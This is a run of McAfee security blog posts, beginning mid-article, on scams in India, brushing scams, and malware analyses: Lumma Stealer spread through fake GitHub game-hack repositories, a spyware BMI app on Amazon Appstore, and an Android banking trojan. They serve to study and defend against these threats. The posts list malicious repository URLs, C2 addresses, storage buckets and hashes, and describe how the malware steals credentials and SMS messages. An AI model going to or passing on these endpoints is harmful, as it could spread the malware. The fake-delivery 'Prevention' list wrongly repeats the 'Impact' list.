    • Check the Country Code: Be cautious if the call comes from an unfamiliar country code.
    • Listen for Inconsistencies: Pay attention to unusual speech patterns or background noises.
    • Limit Information Sharing: Never share sensitive details over the phone unless you’re sure of the caller’s identity.
    • Use Multi-Factor Authentication: Add extra security to sensitive accounts with multi-factor authentication.
    • Stay Informed: Educate yourself and others, especially vulnerable individuals, about voice cloning scams.

     

    4. Credit Card Scam:

    Scam Tactics

    Scammers use various methods to deceive victims into revealing credit card information or making unauthorized payments:

    • Phishing: Fake emails, texts, or websites pretending to be from a legitimate entity (e.g., banks or online stores). Victims are tricked into providing card details or logging into a fake account portal.
    • Skimming: Devices installed on ATMs or payment terminals capture card information. Hidden cameras or fake keypads may record PINs.
    • Vishing (Phone Scams): Scammers impersonate bank representatives or government officials. They ask for credit card details, PINs, or OTPs to “resolve an issue.”
    • Fake Online Shopping Websites: Fraudulent e-commerce sites offer deals to steal card details during fake transactions.

    How to identify Credit card scam:

    • Unsolicited Contact: Unexpected calls, emails, or messages asking for sensitive information.
    • Urgency: Claims of account suspension or fraudulent activity requiring immediate action.
    • Generic Greetings: Messages addressing you as “Dear Customer” or similar vague terms.
    • Suspicious Links: Links in emails or texts that lead to fake websites.
    • Unfamiliar Transactions: Small charges on your statement that you don’t recognize.

    Impact:

    • Loss of Money: Unauthorized purchases can drain your account.
    • Identity Theft: Scammers can misuse your personal details.
    • Credit Problems: Fraudulent charges could damage your credit score.
    • Stress: Victims often face anxiety and frustration.
    • Legal Issues: You may need to dispute fraudulent transactions.

    Prevention:

    • Don’t Share Card Details: Never share your card number, CVV, PIN, or OTP with anyone.
    • Shop on Secure Websites: Only enter card details on sites with “https://” and a padlock icon.
    • Avoid Suspicious Offers: Don’t click on links offering unbelievable discounts or rewards.
    • Check Your Transactions: Regularly review your bank statements for unauthorized charges.
    • Enable Alerts: Set up notifications for every card transaction to catch fraud early.
    • Protect Your Card: Be cautious at ATMs and shops to avoid skimming.
    • Use Virtual Cards: For online shopping, use one-time-use virtual cards if your bank provides them.
    • Install Security Software: Keep your devices safe with antivirus software to block phishing attempts.
    • Report Lost Cards: Inform your bank immediately if your card is lost or stolen.

     

    5. Fake Delivery Scam:

    Scam Tactics:

    In fake delivery scams, fraudsters pose as delivery services to trick you into providing personal information, card details, or payment. Common tactics include:

    • Phishing Messages: Scammers send texts or emails claiming there’s an issue with your package delivery. They include links to fake websites asking for payment or details.
    • Example: “Your package couldn’t be delivered. Pay ₹50 to reschedule: [fake link].”
    • Impersonation Calls: Fraudsters call pretending to be delivery agents, saying extra charges are needed to complete the delivery.
    • Fake Delivery Attempts: A scammer posing as a delivery person asks for cash-on-delivery payment for a package you never ordered.
    • Malware Links: Links in fake delivery notifications may install malware on your device, stealing sensitive information.

    How to Identify Fake Delivery Scams:

    • Unexpected Notifications: You receive a delivery message for a package you didn’t order.
    • Urgent Payment Requests: The scam demands immediate action, such as paying a fee to receive your package.
    • Suspicious Links: Links in the message look unusual or redirect to websites that don’t match the official delivery service.
    • No Tracking Information: Legitimate delivery companies provide proper tracking numbers. Fake messages often lack these or give invalid ones.
    • Unprofessional Communication: Scammers’ messages may contain spelling errors, awkward language, or lack the company’s official logo.

    Impact:

    • Financial Loss: Victims may lose money through fake payment requests.
    • Personal Data Theft: Scammers can steal personal information like credit card details or addresses.
    • Device Infection: Clicking on malicious links can infect your device with malware or spyware.
    • Emotional Stress: Victims may feel anxious or distressed about being targeted.
    • Identity Theft: Stolen data can be used for fraud, such as opening accounts in your name.

    Prevention:

    • Financial Loss: Victims may lose money through fake payment requests.
    • Personal Data Theft: Scammers can steal personal information like credit card details or addresses.
    • Device Infection: Clicking on malicious links can infect your device with malware or spyware.
    • Emotional Stress: Victims may feel anxious or distressed about being targeted.
    • Identity Theft: Stolen data can be used for fraud, such as opening accounts in your name.

     

    6. Digital Arrest Scam

    Scam Tactics:

    Scammers pose as police officers or government officials, accusing victims of being involved in illegal activities like money laundering or cybercrime. They intimidate victims by threatening arrest or legal action unless immediate payment is made to “resolve the matter.”

    • Impersonation and Urgency: Scammers pose as authorities, creating a sense of urgency with threats of arrest or legal consequences to pressure victims.
    • Demands for Payment or Data: They demand immediate payments through untraceable methods or request sensitive personal information for identity theft.
    • Deceptive Tactics: Techniques like fake documents, spoofed contacts, and social engineering are used to make the scam appear credible and manipulate victims.

    How to Identify Digital Arrest Scam:

    • Unsolicited Contact: Be cautious of unexpected calls or messages claiming to be from authorities.
    • Urgency and Threats: Scammers often pressure victims with threats of immediate arrest unless payment is made.
    • Requests for Payment: Legitimate authorities don’t ask for payment over the phone.
    • Unverified Claims: Always verify legal claims by contacting authorities directly through official channels.
    • Isolation Tactics: If asked not to consult others, it’s a red flag.
    • Sensitive Information Requests: Never share personal or financial details over the phone.
    • Unprofessional Communication: Look for poorly written or vague messages.

    Impact: Daily losses from such scams run into lakhs, as victims panic and transfer money or provide sensitive information under pressure.

    Prevention:

    • Verify any claims of legal accusations directly with the authorities.
    • Avoid sharing personal or financial information over the phone.
    • Remember: Genuine law enforcement agencies do not demand payment over the phone.

    What to Do if You Fall Victim

    If you’ve fallen victim to any of the mentioned scams—Digital Arrest Scam, Instant Loan Scam, Voice Cloning Scam, WhatsApp Scam, Fake Delivery Scam or Credit Card Scam—it’s important to take immediate action to minimize damage and protect your finances and personal information. Here are common tips and steps to follow for all these scams:

    1. Report the Scam Immediately:
    • File a Complaint: Report the scam to your local authorities or cybercrime cell. In India, you can file complaints with the Cyber Crime Portal or your local police station. For instant assistance, Dial 1930 to report cybercrime.
    • Inform Your Bank/Financial Institution: If you’ve shared financial details (e.g., bank account or credit card info), contact your bank or credit card provider immediately to block any transactions and prevent further losses.
    • Contact Your Mobile Service Provider: For scams involving SIM cards or mobile-based fraud (like voice cloning or WhatsApp scams), reach out to your service provider to block the number or disable the SIM.
    1. Secure Your Online Accounts:
    • Change Passwords: Immediately change passwords for any accounts that may have been compromised (banking, email, social media). Use strong, unique passwords for each account.
    • Enable Two-Factor Authentication (2FA): Activate two-factor authentication on your important accounts (e.g., email, bank, social media) to add an extra layer of security.
    • Review Account Activity: Look for unauthorized transactions or changes to your account settings and report them.
    1. Monitor Your Financial Statements:
    • Bank and Credit Card Statements: Regularly check your financial statements for unauthorized transactions. If you see any suspicious activity, report it to your bank immediately.
    • Freeze Your Credit: In cases of credit card scams or loan-related fraud, consider placing a freeze on your credit with major credit bureaus to prevent new accounts from being opened in your name.
    1. Do Not Respond to Unsolicited Messages:
    • If you receive unsolicited calls, messages, or emails asking for personal information, do not respond. Scammers often use these methods to steal sensitive data.
    • Do not click on links or download attachments from unknown sources.
    1. Be Cautious with Personal Information:
    • Never share sensitive information like your PIN, passwords, or OTP over the phone or through insecure channels like SMS or email.
    • Digital Arrest Scam: If you receive a threatening message about being arrested, verify the information through official government sources or your local police. Authorities will never demand payment for legal issues.
    1. Report the Phone Number/Email:
    • If the scam came via WhatsApp, SMS, or phone calls, report the number to the respective platform. For WhatsApp, you can block the number and report it directly in the app. Similarly, report phishing emails to your email provider.
    1. Preserve Evidence:
    • Save Screenshots or Records: Keep any evidence (messages, emails, screenshots, etc.) that can be used to investigate the scam. These may be useful when filing a complaint or disputing fraudulent transactions.
    1. Educate Yourself and Others:
    • Stay informed about the latest scams and fraud tactics. Being aware of common signs of scams (e.g., too-good-to-be-true offers, urgent demands for money, etc.) can help you avoid future threats.

    Conclusion:

    As scams in India continue to grow in number and sophistication, it is crucial to raise awareness to protect individuals and businesses from falling victim to these fraudulent schemes. Scams such as phishing, fake job offers, credit card scams, loan scams, investment frauds and online shopping frauds are increasingly targeting unsuspecting victims, causing significant financial loss and emotional harm.

    By raising awareness of scam warning signs and encouraging vigilance, we can equip individuals to make safer, more informed decisions online. Simple precautions, such as verifying sources, being cautious of unsolicited offers, and safeguarding personal and financial information, can go a long way in preventing scams.

    It is essential for both individuals and organizations to stay informed and updated on emerging scam tactics. Through continuous awareness and proactive security measures, we can reduce the impact of scams, ensuring a safer and more secure digital environment for everyone in India.

    The post Rising Scams in India: Building Awareness and Prevention appeared first on McAfee Blog.

    GitHub’s Dark Side: Unveiling Malware Disguised as Cracks, Hacks, and Crypto Tools

    By: McAfee Labs
    antivirus for gaming

    Authored by Aayush Tyagi

    Video game hacks, cracked software, and free crypto tools remain popular bait for malware authors. Recently, McAfee Labs uncovered several GitHub repositories offering these tempting “rewards,” but a closer look reveals something more sinister. As the saying goes, if it seems too good to be true, it probably is.

    GitHub is often exploited for malware distribution due to its accessibility, trustworthiness, and developer-friendly features. Attackers can easily create free accounts and host repositories that appear legitimate, leveraging GitHub’s reputation to deceive users.

    McAfee Labs encountered multiple repositories, offering game hacks for top-selling video games such as Apex Legends, Minecraft, Counter Strike 2.0, Roblox, Valorant,
    Fortnite, Call of Duty, GTA V and or offering cracked versions of popular software and services, such as Spotify Premium, FL Studio, Adobe Express, SketchUp Pro, Xbox Game Pass, and Discord to name a few.

    Executive summary

    These attack chains begin when users would search for Game Hacks, cracked software or tools related to Cryptocurrency on the internet, where they would eventually come across GitHub repositories or YouTube Videos leading to such GitHub repositories, offering such software.

    We noticed a network of such repositories where the description of software keeps on changing, but the payload remains the same: a Lumma Stealer variant. Every week, a new set of repositories with a new malware variant is released, as the older repositories are detected and removed by GitHub. These repositories also include distribution licenses and software screenshots to enhance their appearance of legitimacy.

     

    Figure 1: Attack Vector

    These repositories also contain instructions on how to download and run the malware and ask the user to disable Windows Defender or any AV software, before downloading the malware. They provide the reasoning that, since the software is related to game hacks or by-passing software authentication or crypto-currency mining, AV products will detect and delete these applications.

    This social engineering technique, combined with the trustworthiness of GitHub works well in the favor of malware authors, enabling them to infect more users.

    Children are frequently targeted by such scams, as malware authors exploit their interest in game hacks by highlighting potential features and benefits, making it easier to infect more systems.

    Technical Analysis

    As discussed above, the users would come across malicious repositories through searching the internet (highlighted in red).

    Figure 2: Internet Search showing GitHub results.

    Or through YouTube videos, that contain a link to the repository in the description (highlighted in red).

    Figure 3: YouTube Video containing malicious URL in description.

     

    Once the user accesses the GitHub repository, it contains a Distribution license and other supporting files, to trick the user into thinking that the repository is genuine and credible.

    Figure 4: GitHub repository containing Distribution license.

     

    Repositories also contain a detailed description of the software and installation process further manipulating the user.

    Figure 5: Download instructions present in the repository.

     

    Sometimes, the repositories contain instructions to disable AV products, misleading users to infect themselves with the malware.

    Figure 6: Instructions to disable Windows Defender.

     

    To target more children, repositories contain a detailed description of the software; by highlighting all the features included within the package, such as Aimbots and Speed Hacks, and how easily they will be able to gain an advantage over their opponents.

    They even mention that the package comes with advance Anti-Ban system, so their account won’t be suspended, and that the software has a popular community, to create a perception that, since multiple users are already using this software, it must be safe to use and that, by not using the software, they are missing out.

    Figure 7: Features mentioned in the GitHub repository.

     

    The downloaded files, in most cases, were Lumma Stealer variants, but observing the latest repositories, we noticed new malware variants were also being distributed through the same infection vector.

    Once the user downloads the file, they get the following set of files.

    Figure 8: Files downloaded from GitHub repository.

     

    On running the ‘Loader.exe’ file, as instructed, it iterates through the system and the registry keys to collect sensitive information.

    Figure 9: Loader.exe checking for Login credentials for Chrome.

     

    It searches for crypto wallets and password related files. It searches for a list of browsers installed and iterates through user data, to gather anything useful.

    Figure 10: Loader.exe checking for Browsers installed on the system.

     

    Then the malware connects to C2 servers to transfer data.

     Figure 11: Loader.exe connecting to C2 servers to transfer data.

    This behavior is similar to the Lumma Stealer variants we have seen earlier.

    Detection and Mitigation Strategies

    McAfee blocks this infection chain at multiple stages:

    1. URL blocking of the GitHub repository.

    Figure 12: McAfee blocking URLs

    1. Detecting downloaded malware.

    Figure 13: McAfee blocking the malicious file

     

    Conclusion and Recommendations

    In conclusion, the GitHub repository infection chain demonstrates how cybercriminals exploit accessibility and trustworthiness of popular websites such as GitHub, to distribute malware like Lumma Stealer. By leveraging the user’s desire to use game hacks, to be better at a certain video game or obtain licensed software for free, they trick users into infecting themselves.

    At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the GitHub repository technique. Here are our recommended mitigations and remediations:

    1. Children are usually the prime targets for such scams, it is important to educate the young ones and teach them how to avoid such fishy websites.
    2. Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
    3. Install and maintain updated antivirus and anti-malware software on all endpoints.
    4. Use network segmentation to limit the spread of malware within the organization.
    5. Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
    6. Avoid downloading cracked software or visiting suspicious websites.
    7. Verify URLs in emails, especially from unknown or unexpected sources.
    8. Keep antivirus solutions updated and actively scanning.
    9. Avoid downloading Game hacks or Crypto software from unofficial websites.
    10. If possible, read reviews about the software you’re downloading and see what other users are saying about the malware.
    11. Regularly patch browsers, operating systems, and applications.
    12. Monitor the Temp folder for unusual or suspicious files.

    Indicators of Compromise (IoCs)

    As of publishing this blog, these are the GitHub repositories that are currently active.

    File Type SHA256/URLs
       
    URLs github[.]com/632763276327ermwhatthesigma/hack-apex-1egend
      github[.]com/VynnProjects/h4ck-f0rtnite
      github[.]com/TechWezTheMan/Discord-AllinOne-Tool
      github[.]com/UNDERBOSSDS/ESET-KeyGen-2024
      github[.]com/Rinkocuh/Dayz-Cheat-H4ck-A1mb0t
      github[.]com/Magercat/Al-Photoshop-2024
      github[.]com/nate24321/minecraft-cheat2024
      github[.]com/classroom-x-games/counter-str1ke-2-h4ck
      github[.]com/LittleHa1r/ESET-KeyGen-2024
      github[.]com/ferhatdermaster/Adobe-Express-2024
      github[.]com/CrazFrogb/23fasd21/releases/download/loader/Loader[.]Github[.]zip
      github[.]com/flashkiller2018/Black-Ops-6-Cheats-including-Unlocker-Tool-and-RICOCHET-Bypass
      github[.]com/Notalight/h4ck-f0rtnite
      github[.]com/Ayush9876643/r0blox-synapse-x-free
      github[.]com/FlqmzeCraft/cheat-escape-from-tarkov
      github[.]com/Ayush9876643/cheat-escape-from-tarkov
      github[.]com/Ayush9876643/rust-hack-fr33
      github[.]com/ppetriix/rust-hack-fr33
      github[.]com/Ayush9876643/Roblox-Blox-Fruits-Script-2024
      github[.]com/LandonPasana21/Roblox-Blox-Fruits-Script-2024
      github[.]com/Ayush9876643/Rainbow-S1x-Siege-Cheat
      github[.]com/Ayush9876643/SonyVegas-2024
      github[.]com/123456789433/SonyVegas-2024
      github[.]com/Ayush9876643/Nexus-Roblox
      github[.]com/cIeopatra/Nexus-Roblox
      github[.]com/Ayush9876643/m0dmenu-gta5-free
      github[.]com/GerardoR17/m0dmenu-gta5-free
      github[.]com/Ayush9876643/minecraft-cheat2024
      github[.]com/RakoBman/cheat-apex-legends-download
      github[.]com/Ayush9876643/cheat-apex-legends-download
      github[.]com/cIiqued/FL-Studio
      github[.]com/Ayush9876643/FL-Studio
      github[.]com/Axsle-gif/h4ck-f0rtnite
      github[.]com/Ayush9876643/h4ck-f0rtnite
      github[.]com/SUPAAAMAN/m0dmenu-gta5-free
      github[.]com/atomicthefemboy/cheat-apex-legends-download
      github[.]com/FlqmzeCraft/cheat-escape-from-tarkov
      github[.]com/Notalight/h4ck-f0rtnite
      github[.]com/Notalight/FL-Studio
      github[.]com/Notalight/r0blox-synapse-x-free
      github[.]com/Notalight/cheat-apex-legends-download
      github[.]com/Notalight/cheat-escape-from-tarkov
      github[.]com/Notalight/rust-hack-fr33
      github[.]com/Notalight/Roblox-Blox-Fruits-Script-2024
      github[.]com/Notalight/Rainbow-S1x-Siege-Cheat
      github[.]com/Notalight/SonyVegas-2024
      github[.]com/Notalight/Nexus-Roblox
      github[.]com/Notalight/minecraft-cheat2024
      github[.]com/Notalight/m0dmenu-gta5-free
      github[.]com/ZinkosBR/r0blox-synapse-x-free
      github[.]com/ZinkosBR/cheat-escape-from-tarkov
      github[.]com/ZinkosBR/rust-hack-fr33
      github[.]com/ZinkosBR/Roblox-Blox-Fruits-Script-2024
      github[.]com/ZinkosBR/Rainbow-S1x-Siege-Cheat
      github[.]com/ZinkosBR/Nexus-Roblox
      github[.]com/ZinkosBR/m0dmenu-gta5-free
      github[.]com/ZinkosBR/minecraft-cheat2024
      github[.]com/ZinkosBR/h4ck-f0rtnite
      github[.]com/ZinkosBR/FL-Studio
      github[.]com/ZinkosBR/cheat-apex-legends-download
      github[.]com/EliminatorGithub/counter-str1ke-2-h4ck
      Github[.]com/ashishkumarku10/call-0f-duty-warz0ne-h4ck
     
    EXEs CB6DDBF14DBEC8AF55986778811571E6
      C610FD2A7B958E79F91C5F058C7E3147
      3BBD94250371A5B8F88B969767418D70
      CF19765D8A9A2C2FD11A7A8C4BA3DEDA
      69E530BC331988E4E6FE904D2D23242A
      35A2BDC924235B5FA131095985F796EF
      EB604E2A70243ACB885FE5A944A647C3
      690DBCEA5902A1613CEE46995BE65909
      2DF535AFF67A94E1CDAD169FFCC4562A
      84100E7D46DF60FE33A85F16298EE41C
      00BA06448D5E03DFBFA60A4BC2219193
       
    C2 Domains 104.21.48.1
      104.21.112.1
      104.21.16.1

     

    The post GitHub’s Dark Side: Unveiling Malware Disguised as Cracks, Hacks, and Crypto Tools appeared first on McAfee Blog.

    Brushing Scams: What They Are and How to Stay Safe From Unsolicited Packages

    By: McAfee

    It’s an increasingly common surprise: a package shows up at your door with your name and your address…but you never ordered it.  

    These unsolicited deliveries may seem harmless, but they’re often tied to a scheme called a brushing scam. These scams occur year-round but tend to pick up around the holidays or peak shopping seasons, when shipping volume spikes and it’s easier for suspicious packages to blend in. 

    Below is everything you need to know: how brushing scams work, what they mean for your personal information, and the exact steps to take if one shows up at your doorstep. 

     Takeaways 

    • A brushing scam is when a seller sends you an item you didn’t order so they can post a fake “verified purchase” review under your name. 
    • These scams usually involve low-value items like cheap jewelry, seeds, or trinkets. 
    • Unexpected packages can signal that your personal data was exposed in a breach or has been purchased illegally. 
    • You don’t have to return the item, but you should report it, update your passwords, and check for suspicious activity. 
    • These scams increase during busy shipping periods, including holidays. 

    What Is a Brushing Scam? 

    A brushing scam is when sellers send you unsolicited items so they can post fake reviews using your name, boosting their product’s ranking and credibility without your consent. 

    How Brushing Scams Work 

    A typical brushing scam looks like this: 

    1. A scammer creates or uses a seller account on a marketplace like Amazon or AliExpress. 
    2. They obtain your name and address, often through a breach, data leak, or illegal database. 
    3. They “order” their own product but send it to you at no cost. 
    4. Once shipping confirms delivery, they post a fake verified review under your identity to boost their seller rating. 
    5. The product gains more visibility, which drives more sales. 

    In one sentence: Your delivery confirmation becomes their proof that a real customer received the item—even though you never ordered it. 

    Why It’s Called “Brushing” 

    The term comes from e-commerce, where sellers would “brush up” their sales by generating fake orders and reviews. Today, brushing scams are a global issue affecting major online marketplaces. 

    Common Items Sent in Brushing Scams 

    • Costume jewelry 
    • Small electronics or keychain gadgets 
    • Random home goods 
    • Seeds (often unmarked) 
    • Low-cost accessories 

    If the item feels random or unusually cheap, it fits the profile. 

    Are Brushing Scams Dangerous? 

    Personal Data Exposure

    The biggest red flag is that someone had your name and address, and possibly more. Brushing scams often follow data breaches or third-party leaks. 

    Account Risk

    Some platforms may temporarily flag or freeze your account if someone posts fake reviews under your name. 

    Misleading Products

    Fake reviews inflate trust and push low-quality items higher in search results. That misleads other shoppers and props up fraudulent sellers.

    Potential Safety Hazards

    Some unsolicited items—cosmetics, supplements, electronics, or seeds—may be unsafe, expired, counterfeit, or banned. 

    What To Do If You Receive an Unordered Package 

    1. Don’t use or consume the item, especially cosmetics, food, or electronics. 
    2. Check your marketplace account (Amazon, AliExpress, etc.) to confirm there’s no unauthorized order. 
    3. Report the brushing scam using the platform’s built-in reporting tools. 
    4. Update your passwords for your shopping account and linked email. 
    5. Enable two-factor authentication (2FA) for added security. 
    6. Monitor bank/credit card activity for unusual charges. 
    7. If the package came via USPS, you can mark it “Return to sender” without cost. 

    How to Report a Brushing Scam on Amazon 

    1. Log into your Amazon account. 
    2. Go to the Report Unsolicited Package section. 
    3. Add your tracking number and package details. 
    4. Amazon may take up to 10 days to investigate. 

    Should You Return the Package? 

    Generally: No.

    You are not legally required to return or pay for an unsolicited package. But reporting it helps platforms investigate fraudulent sellers. 

    How To Protect Yourself From Brushing Scams

    Secure Your Accounts

    Report Every Unsolicited Package

    This helps platforms identify abusive sellers.

    Verify Reviews Before Buying

    Genuine reviews mention specific details; fake ones are vague, repetitive, or overly positive.

    Stick to Well-Reviewed, Long-Standing Sellers

    Avoid newly created storefronts with few verified reviews.

    Quick FAQ 

    Why am I receiving random packages from overseas?
    It’s often part of a brushing scam where sellers need a “delivered” status to post fake reviews.

    Is a brushing scam identity theft?
    Not exactly, but it does mean someone had access to your personal data, which increases your overall risk.

    Should I throw the item away?
    You can safely discard most brushing-scam items, but avoid using them and report the incident first.

    Should I worry if I get seeds or soil?
    Yes—never plant or dispose of unknown seeds improperly. Report them to the USDA or your state agriculture office.

    Final Thoughts

    Brushing scams may seem like a harmless freebie, but they’re a sign that your personal information was exposed and could potentially be misused.

    Stay cautious, secure your accounts, report any unsolicited packages, and trust only reputable sellers. With simple steps, you can protect your identity, and avoid being pulled into a scammer’s fake review scheme.

    The post Brushing Scams: What They Are and How to Stay Safe From Unsolicited Packages appeared first on McAfee Blog.

    Spyware distributed through Amazon Appstore

    By: McAfee Labs

    Authored by Wenfeng Yu and ZePeng Chen

    As smartphones have become an integral part of our daily lives, malicious apps have grown increasingly deceptive and sophisticated. Recently, we uncovered a seemingly harmless app called “BMI CalculationVsn” on the Amazon App Store, which is secretly stealing the package name of installed apps and incoming SMS messages under the guise of a simple health tool. McAfee reported the discovered app to Amazon, which took prompt action, and the app is no longer available on Amazon Appstore.

    Figure 1. Application published on Amazon Appstore

     

    Superficial Functionality: Simple BMI Calculation

    On the surface, this app appears to be a basic tool, providing a single page where users can input their weight and height to calculate their BMI. Its interface looks entirely consistent with a standard health application. However, behind this innocent appearance lies a range of malicious activities.

    Figure 2. Application MainActivity

     

    Malicious Activities: Stealing Private Data

    Upon further investigation, we discovered that this app engages in the following harmful behaviors:

    1. Screen Recording: The app starts a background service to record the screen and when the user clicks the “Calculate” button, the Android system will pop up request screen recording permission message and start screen recording. This functionality is likely to capture gesture passwords or sensitive data from other apps. In the analysis of the latest existing samples, it was found that the developer was not ready for this function. The code did not upload the recorded mp4 file to the C2 server, and at the beginning of the startRecording() method, the developer added a code that directly returns and does not execute follow code.

    Figure 3. Screen Recorder Service Code

     

    When the recording starts, the permission request dialog will be displayed.

    Figure 4. Start Recording Request.

     

    1. Installed App Information: The app scans the device to retrieve a list of all installed applications. This data could be used to identify target users or plan more advanced attacks.

    Figure 5. Upload User Data

     

    1. SMS Messages: It intercepts and collects all SMS messages received on the device, potentially to capture one-time password (OTP), verification codes and sensitive information. The intercepted text messages will be added to Firebase (storage bucket: testmlwr-d4dd7.appspot.com).

    Malware under development:

    According to our analysis of historical samples, this malicious app is still under development and testing stage and has not reached a completed state. By searching for related samples on VirusTotal based on the malware’s package name (com.zeeee.recordingappz) revealed its development history. We can see that this malware was first developed in October 2024 and originally developed as a screen recording app, but midway through the app’s icon was changed to the BMI calculator, and the payload to steal SMS messages was added in the latest version.

    Figure 6. The Timeline of Application Development

     

    The address of the Firebase Installation API used by this app uses the character “testmlwr” which indicates that this app is still in the testing phase.

    App Developer Information:

    According to the detailed information about this app product on the Amazon page, the developer’s name is: “PT. Visionet Data Internasional”. The malware author tricked users by abusing the names of an enterprise IT management service provider in Indonesia to distribute this malware on Amazon Appstore. This fact suggests that the malware author may be someone with knowledge of Indonesia.

    Figure 7. Developer Information

     

    How to Protect Yourself

    To avoid falling victim to such malicious apps, we recommend the following precautions:

    1. Install Trusted Antivirus Apps: Use reliable antivirus software to detect and prevent malicious apps before they can cause harm.
    2. Review Permission Requests: When installing an app, carefully examine the permissions it requests. Deny any permissions that seem unrelated to its advertised functionality. For instance, a BMI calculator has no legitimate reason to request access to SMS or screen recording.
    3. Stay Alert: Watch for unusual app behavior, such as reduced device performance, rapid battery drain, or a spike in data usage, which could indicate malicious activity running in the background.

    Conclusion

    As cybercrime continues to evolve, it is crucial to remain vigilant in protecting our digital lives. Apps like “BMI CalculationVsn” serve as a stark reminder that even the simplest tools can harbor hidden threats. By staying alert and adopting robust security measures, we can safeguard our privacy and data.

    IoC

    Distribution website:

    • hxxps://www.amazon.com/PT-Visionet-Data-Internasional-CalculationVsn/dp/B0DK1B7ZM5/

    C2 servers/Storage buckets:

    • hxxps://firebaseinstallations.googleapis.com/v1/projects/testmlwr-d4dd7
    • hxxps://6708c6e38e86a8d9e42ffe93.mockapi.io/
    • testmlwr-d4dd7.appspot.com

    Sample Hash:

    • 8477891c4631358c9f3ab57b0e795e1dcf468d94a9c6b6621f8e94a5f91a3b6a

    The post Spyware distributed through Amazon Appstore appeared first on McAfee Blog.

    A New Android Banking Trojan Masquerades as Utility and Banking Apps in India

    By: McAfee Labs

    Authored by Dexter Shin

    Over the years, cyber threats targeting Android devices have become more sophisticated and persistent. Recently, McAfee Mobile Research Team discovered a new Android banking trojan targeting Indian users. This malware disguises itself as essential services, such as utility (e.g., gas or electricity) or banking apps, to get sensitive information from users. These types of services are vital for daily life, making it easier to lure users. We have previously observed malware that masquerades as utility services in Japan. As seen in such cases, utility-related messages, such as warnings that gas service will disconnect soon unless the bill is checked, can cause significant alarm and prompt immediate action from the users.

    We have identified that this malware has infected 419 devices, intercepted 4,918 SMS messages, and stolen 623 entries of card or bank-related personal information. Given the active malware campaigns, these numbers are expected to rise. McAfee Mobile Security already detects this threat as Android/Banker. For more information, visit McAfee Mobile Security

    Phishing through messaging platforms like WhatsApp

    As of 2024, India is the country with the highest number of monthly active WhatsApp users. This makes it a prime target for phishing attacks. We’ve previously introduced another Banker distributed via WhatsApp. Similarly, we suspect that the sample we recently found also uses messaging platforms to reach individual users and trick them into installing a malicious APK. If a user installs this APK, it will allow attackers to steal the victim’s financial data, thereby accomplishing their malicious goal.

    Figure 1. Scammer messages reaching users via Whatsapp (source: reddit)

     

    Inside the malware

    The malware we first identified was pretending to be an app that allowed users to pay their gas bills. It used the logo of PayRup, a digital payment platform for public service fees in India, to make it look more trustworthy to users.

    Figure 2. Malware disguised as gas bills digital payment app

     

    Once the app is launched and the permissions, which are designed to steal personal data such as SMS messages, are granted, it asks the user for financial information, such as card details or bank account information. Since this malware pretends to be an app for paying bills, users are likely to input this information to complete their payments. On the bank page, you can see major Indian banks like SBI and Axis Bank listed as options.

    Figure 3. Malware that requires financial data

     

    If the user inputs their financial information and tries to make a payment, the data is sent to the command and control (C2) server. Meanwhile, the app displays a payment failure message to the user.

    Figure 4. Payment failure message displayed but data sent to C2 server

     

    One thing to note about this app is that it can’t be launched directly by the user through the launcher. For an Android app to appear in the launcher, it needs to have “android.intent.category.LAUNCHER” defined within an <intent-filter> in the AndroidManifest.xml. However, since this app doesn’t have that attribute, its icon doesn’t appear. Consequently, after being installed and launched from a phishing message, users may not immediately realize the app is still installed on their device, even if they close it after seeing messages like “Bank Server is Down”, effectively keeping it hidden.

    Figure 5. AndroidManifest.xml for the sample

     

    Exploiting Supabase for data exfiltration

    In previous reports, we’ve introduced various C2 servers used by malware. However, this malware stands out due to its unique use of Supabase, an open-source database service. Supabase is an open-source backend-as-a-service, similar to Firebase, that provides PostgreSQL-based database, authentication, real-time features, and storage. It helps developers quickly build applications without managing backend infrastructure. Also, it supports RESTful APIs to manage their database. This malware exploits these APIs to store stolen data.

    Figure 6. App code using Supabase

     

    A JWT (JSON Web Token) is required to utilize Supabase through its RESTful APIs. Interestingly, the JWT token is exposed in plain text within the malware’s code. This provided us with a unique opportunity to further investigate the extent of the data breach. By leveraging this token, we were able to access the Supabase instance used by the malware and gain valuable insights into the scale and nature of the data exfiltration.

    Figure 7. JWT token exposed in plaintext

     

    During our investigation, we discovered a total of 5,558 records stored in the database. The first of these records was dated October 9, 2024. As previously mentioned, these records include 4,918 SMS messages and 623 entries of card information (number, expiration date, CVV) and bank information (account numbers, login credentials like ID and password).

    Figure 8. Examples of stolen data

     

    Uncovering variants by package prefix

    The initial sample we found had the package name “gs_5.customer”. Through investigation of their database, we identified 8 unique package prefixes. These prefixes provide critical clues about the potential scam themes associated with each package. By examining the package names, we can infer specific characteristics and likely focus areas of the various scam operations.

    Package Name Scam Thema
    ax_17.customer Axis Bank
    gs_5.customer Gas Bills
    elect_5.customer Electrical Bills
    icici_47.customer ICICI Bank
    jk_2.customer J&K Bank
    kt_3.customer Karnataka Bank
    pnb_5.customer Punjab National Bank
    ur_18.customer Uttar Pradesh Co-Operative Bank

    Based on the package names, it seems that once a scam theme is selected, at least 2 different variants are developed within that theme. This variability not only complicates detection efforts but also increases the potential reach and impact of their scam campaigns.

    Mobile app management of C2

    Based on the information uncovered so far, we found that the malware actor has developed and is actively using an app to manage the C2 infrastructure directly from a device. This app can send commands to forward SMS messages from the victim’s active phones to specified numbers. This capability differentiates it from previous malware, which typically manages C2 servers via web interfaces. The app stores various configuration settings through Firebase. Notably, it utilizes Firebase “Realtime Database” rather than Firestore, likely due to its simplicity for basic data retrieval and storage.

    Figure 9. C2 management mobile application

     

    Conclusion

    Based on our research, we have confirmed that 419 unique devices have already been infected. However, considering the continual development and distribution of new variants, we anticipate that this number will steadily increase. This trend underscores the persistent and evolving nature of this threat, emphasizing the need for careful observation and flexible security strategies.

    As mentioned at the beginning of the report, many scams originate from messaging platforms like WhatsApp. Therefore, it’s crucial to remain cautious when receiving messages from unknown or uncertain sources. Additionally, given the clear emergence of various variants, we recommend using security software that can quickly respond to new threats. Furthermore, by employing McAfee Mobile Security, you can bolster your defense against such sophisticated threats.

    Indicators of Compromise (IOCs)

     

    APKs:

    SHA256 Package Name App Name
    b7209653e226c798ca29343912cf21f22b7deea4876a8cadb88803541988e941 gs_5.customer Gas Bill Update
    7cf38f25c22d08b863e97fd1126b7af1ef0fcc4ca5f46c2384610267c5e61e99 ax_17.customer Client Application
